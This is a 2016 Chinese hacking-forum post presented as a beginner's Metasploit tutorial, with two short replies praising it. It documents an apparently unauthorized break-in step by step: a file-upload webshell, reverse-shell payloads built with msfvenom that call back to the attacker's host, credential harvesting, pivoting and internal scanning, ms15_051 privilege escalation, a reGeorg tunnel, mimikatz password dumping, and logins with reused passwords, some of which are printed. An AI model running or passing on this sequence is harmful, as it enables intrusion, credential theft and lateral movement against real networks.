搜索
查看: 1051|回复: 3

Metasploit完整渗透 初级教学

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2016-2-15 17:07:04 | 显示全部楼层 |阅读模式
在http:xxxx.xxx.xx.xxx发现任意文件上传漏洞,果断上传webshell

首先用Metasploit生成反弹马,也就是生成反弹的payload:
成功生成反弹型payload:
(1)生成win下的exe
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe x> /home/niexinming/back.exe
(2)生成win下的aspx
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx
其他的生成payload 的方法见:http://netsec.ws/?p=331

(3)我生成一个aspx的反弹马

然后启动msfconsole

(4)
本地监听,反弹后的控制端:use exploit/multi/handler

(5)
本地监听的确定用哪个payload:
set payload windows/meterpreter/reverse_tcp

(6)
设置本地监听的端口:
set lport 7788

(7)
设置本地的监听的地址
set lhost 0.0.0.0

(8)
运行:
run

(9)访问生成的反弹马:
http://xxx.xxx.xx.xxx:/back.aspx

得到meterpreter的shell

[/url]
(10)
meterpreter查看路由:

run get_local_subnets

(11)
meterpreter 寻找putty保存的信息
run enum_putty

(12)meterpreter 寻找ie保存的密码
run post/windows/gather/enum_ie

(13)
meterpreter运行cmd

shell

退出cmd shell 为:ctrl+c
[url=http://static.wooyun.org/upload/image/201601/2016013121403047247.png]

(14)
把meterpreter放入后台:
background

(15)
添加路由(这样才能进行内网的扫描):
route add 192.168.0.0 255.255.255.0 1
route add的第一个参数是地址,第二个参数地址是掩码,第三个参数是sessis的id
(在metasploit添加一个路由表,目的是访问10.1.1.129将通过meterpreter的会话 1 来访问:
  1. route add 10.1.1.129 255.255.255.255 1
复制代码

这里如果要代理10.1.1.129/24 到session 1,则可以这么写

  1. route add 10.1.1.0 255.255.255.0 1
复制代码

)
[/url]
(16)

进行内网的主机扫描:利用smb进行主机识别:
use auxiliary/scanner/smb/smb_version

先看看这个模块需要哪些参数

show options
[url=http://static.wooyun.org/upload/image/201601/2016013121421282394.png]

设置rhost

set rhosts 192.168.0.0/24

设置线程:
set threads 50

run
得到结果:
[/url]
(17)扫描端口:

use auxiliary/scanner/portscan/tcp

设置扫描的范围:

set rhosts 192.168.0.0/24

设置扫描的端口:
set ports 22,23,21,3389,1433,80,8080,81,82

设置线程:
set threads 50

运行:
run

运行结果:

  • 192.168.0.7:23 - TCP OPEN
  • 192.168.0.7:80 - TCP OPEN
  • 192.168.0.18:3389 - TCP OPEN
  • 192.168.0.9:80 - TCP OPEN
  • 192.168.0.9:23 - TCP OPEN
  • 192.168.0.18:1433 - TCP OPEN
  • 192.168.0.5:23 - TCP OPEN
  • 192.168.0.4:23 - TCP OPEN
  • 192.168.0.4:80 - TCP OPEN
  • 192.168.0.6:80 - TCP OPEN
  • 192.168.0.5:80 - TCP OPEN
  • 192.168.0.6:23 - TCP OPEN
  • Scanned  30 of 256 hosts (11% complete)
  • 192.168.0.55:3389 - TCP OPEN
  • 192.168.0.88:3389 - TCP OPEN
  • 192.168.0.88:1433 - TCP OPEN
  • 192.168.0.88:80 - TCP OPEN
  • Scanned  73 of 256 hosts (28% complete)
  • Scanned  81 of 256 hosts (31% complete)
  • 192.168.0.120:80 - TCP OPEN
  • 192.168.0.127:1433 - TCP OPEN
  • 192.168.0.129:1433 - TCP OPEN
  • 192.168.0.128:22 - TCP OPEN
  • 192.168.0.129:80 - TCP OPEN
  • 192.168.0.130:1433 - TCP OPEN
  • 192.168.0.130:3389 - TCP OPEN
  • 192.168.0.127:3389 - TCP OPEN
  • 192.168.0.128:80 - TCP OPEN
  • 192.168.0.135:8080 - TCP OPEN
  • 192.168.0.129:3389 - TCP OPEN
  • 192.168.0.130:8080 - TCP OPEN
  • 192.168.0.134:3389 - TCP OPEN
  • 192.168.0.135:3389 - TCP OPEN
  • 192.168.0.135:1433 - TCP OPEN
  • 192.168.0.131:1433 - TCP OPEN
  • 192.168.0.135:80 - TCP OPEN
  • 192.168.0.131:80 - TCP OPEN
  • 192.168.0.139:80 - TCP OPEN
  • 192.168.0.131:3389 - TCP OPEN
  • 192.168.0.136:80 - TCP OPEN
  • 192.168.0.139:1433 - TCP OPEN
  • 192.168.0.136:8080 - TCP OPEN
  • 192.168.0.136:3389 - TCP OPEN
  • 192.168.0.136:1433 - TCP OPEN
  • 192.168.0.139:3389 - TCP OPEN
  • 192.168.0.139:8080 - TCP OPEN
  • 192.168.0.120:22 - TCP OPEN
  • Scanned 111 of 256 hosts (43% complete)
  • Scanned 128 of 256 hosts (50% complete)
  • 192.168.0.155:22 - TCP OPEN
  • 192.168.0.160:1433 - TCP OPEN
  • 192.168.0.160:21 - TCP OPEN
  • 192.168.0.160:82 - TCP OPEN
  • 192.168.0.160:22 - TCP OPEN
  • 192.168.0.161:8080 - TCP OPEN
  • 192.168.0.160:3389 - TCP OPEN
  • 192.168.0.160:80 - TCP OPEN
  • 192.168.0.175:80 - TCP OPEN
  • 192.168.0.172:80 - TCP OPEN
  • 192.168.0.172:82 - TCP OPEN
  • 192.168.0.161:22 - TCP OPEN
  • 192.168.0.161:80 - TCP OPEN
  • 192.168.0.175:1433 - TCP OPEN
  • 192.168.0.175:3389 - TCP OPEN
  • 192.168.0.172:3389 - TCP OPEN
  • 192.168.0.170:1433 - TCP OPEN
  • 192.168.0.176:3389 - TCP OPEN
  • 192.168.0.176:1433 - TCP OPEN
  • 192.168.0.178:3389 - TCP OPEN
  • 192.168.0.176:80 - TCP OPEN
  • 192.168.0.177:1433 - TCP OPEN
  • 192.168.0.178:1433 - TCP OPEN
  • 192.168.0.170:80 - TCP OPEN
  • 192.168.0.174:3389 - TCP OPEN
  • 192.168.0.177:3389 - TCP OPEN
  • 192.168.0.181:80 - TCP OPEN
  • 192.168.0.181:3389 - TCP OPEN
  • 192.168.0.174:80 - TCP OPEN
  • 192.168.0.181:1433 - TCP OPEN
  • 192.168.0.179:3389 - TCP OPEN
  • 192.168.0.179:1433 - TCP OPEN
  • 192.168.0.182:3389 - TCP OPEN
  • 192.168.0.182:80 - TCP OPEN
  • 192.168.0.185:3389 - TCP OPEN
  • 192.168.0.185:1433 - TCP OPEN
  • 192.168.0.189:80 - TCP OPEN
  • 192.168.0.189:21 - TCP OPEN
  • 192.168.0.189:22 - TCP OPEN
  • 192.168.0.185:80 - TCP OPEN
  • 192.168.0.189:8080 - TCP OPEN
  • 192.168.0.189:3389 - TCP OPEN
  • 192.168.0.191:80 - TCP OPEN
  • 192.168.0.188:3389 - TCP OPEN
  • 192.168.0.189:1433 - TCP OPEN
  • 192.168.0.151:22 - TCP OPEN
  • 192.168.0.170:3389 - TCP OPEN
  • 192.168.0.181:8080 - TCP OPEN
  • 192.168.0.179:80 - TCP OPEN
  • 192.168.0.191:3389 - TCP OPEN
  • Scanned 172 of 256 hosts (67% complete)
  • Scanned 180 of 256 hosts (70% complete)
  • 192.168.0.200:80 - TCP OPEN
  • 192.168.0.201:22 - TCP OPEN
  • 192.168.0.202:22 - TCP OPEN
  • 192.168.0.203:8080 - TCP OPEN
  • 192.168.0.206:22 - TCP OPEN
  • 192.168.0.205:3389 - TCP OPEN
  • 192.168.0.204:22 - TCP OPEN
  • 192.168.0.216:22 - TCP OPEN
  • 192.168.0.215:3389 - TCP OPEN
  • 192.168.0.203:80 - TCP OPEN
  • 192.168.0.218:80 - TCP OPEN
  • 192.168.0.230:22 - TCP OPEN
  • 192.168.0.233:8080 - TCP OPEN
  • 192.168.0.237:3389 - TCP OPEN
  • 192.168.0.231:22 - TCP OPEN
  • 192.168.0.225:8080 - TCP OPEN
  • 192.168.0.226:22 - TCP OPEN
  • 192.168.0.225:22 - TCP OPEN
  • 192.168.0.227:8080 - TCP OPEN
  • 192.168.0.232:22 - TCP OPEN
  • 192.168.0.236:22 - TCP OPEN
  • 192.168.0.229:22 - TCP OPEN
  • 192.168.0.223:22 - TCP OPEN
  • 192.168.0.234:22 - TCP OPEN
  • 192.168.0.235:3389 - TCP OPEN
  • 192.168.0.205:80 - TCP OPEN
  • 192.168.0.203:22 - TCP OPEN
  • 192.168.0.207:22 - TCP OPEN
  • 192.168.0.227:80 - TCP OPEN
  • 192.168.0.224:22 - TCP OPEN
  • 192.168.0.235:1433 - TCP OPEN
  • 192.168.0.233:22 - TCP OPEN
  • 192.168.0.235:80 - TCP OPEN
  • Scanned 226 of 256 hosts (88% complete)
  • 192.168.0.238:80 - TCP OPEN
  • 192.168.0.239:80 - TCP OPEN
  • 192.168.0.242:80 - TCP OPEN
  • 192.168.0.243:80 - TCP OPEN
  • 192.168.0.241:80 - TCP OPEN
  • 192.168.0.240:80 - TCP OPEN
  • 192.168.0.253:23 - TCP OPEN
  • 192.168.0.253:80 - TCP OPEN
  • 192.168.0.254:23 - TCP OPEN
  • 192.168.0.252:80 - TCP OPEN
  • 192.168.0.252:23 - TCP OPEN
  • 192.168.0.254:80 - TCP OPEN
  • Scanned 236 of 256 hosts (92% complete)
  • Scanned 256 of 256 hosts (100% complete)
  • Auxiliary module execution completed

    在局域网里面寻找匿名ftp:
    use auxiliary/scanner/ftp/anonymous

    设置ip段:
    set rhosts 192.168.0.0/24

    设置线程:
    set threads 50

    运行结果:
    [url=http://static.wooyun.org/upload/image/201601/2016013121432824242.png]


    在webshell 里面
    查看权限:

    whoami

    权限很高:

    [/url]

    如果权限低,则查看systeminfo

    主要看里面打的补丁:

    [url=http://static.wooyun.org/upload/image/201601/2016013121442330933.png]


    补丁没有打,所以可以用ms15_051 这个exp秒掉

    然后

    添加一个账户

    [/url]
    然后上reGeorg

    上传:

    tunnel.aspx

    然后:
    访问:

    http:xxx.xxx.xxx.xx/tunnel.aspx
    然后发现:
    Georg says, 'All seems fine'证明可以使用:

    然后:
    python reGeorgSocksProxy.py -p 1090 -u [url]http://xxx.xxx.xxx.xxx/download/tunnel.aspx


    然后用proxychains访问远程桌面:

    proxychains rdesktop -a 16 -u hehe -p Admin#123 127.0.0.1



    [/url]




    然后上传猕猴桃把密码搞出来:

    [url=http://static.wooyun.org/upload/image/201601/2016013121453042480.png]



    然后用管理员的账户登陆上去:

    [/url]


    然后开远程登陆记录,发现管理员用远程登陆记住了192.168.0.136的密码:

    登陆上去,然后脱下来本机密码:



    [url=http://static.wooyun.org/upload/image/201601/2016013121464733141.png]




    截获一个密码是通用密码:

    administraror

    xseries_ellassay

    登陆开了3389的主机


    首先:

    192.168.0.160

    [/url]

    然后:

    192.168.0.170

    用户名:xz
    密码:xz

    [url=http://static.wooyun.org/upload/image/201601/2016013121472979638.png]

    用通用密码登陆192.168.0.181



    [/url]


    然后通用密码登陆192.168.0.170:


    [url=http://static.wooyun.org/upload/image/201601/2016013121491687421.png]


  • 本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?Join BUC

    x
    过段时间可能会取消签到功能了
    20cn 该用户已被删除
    发表于 2016-2-20 21:04:41 | 显示全部楼层
    厉害!学习学习
    Mr.冷雪 该用户已被删除
    发表于 2016-2-29 22:03:41 | 显示全部楼层
    不错,感谢楼主分享,学习了
    您需要登录后才可以回帖 登录 | Join BUC

    本版积分规则

    Powered by Discuz!

    © 2012-2015 Baiker Union of China.

    快速回复 返回顶部 返回列表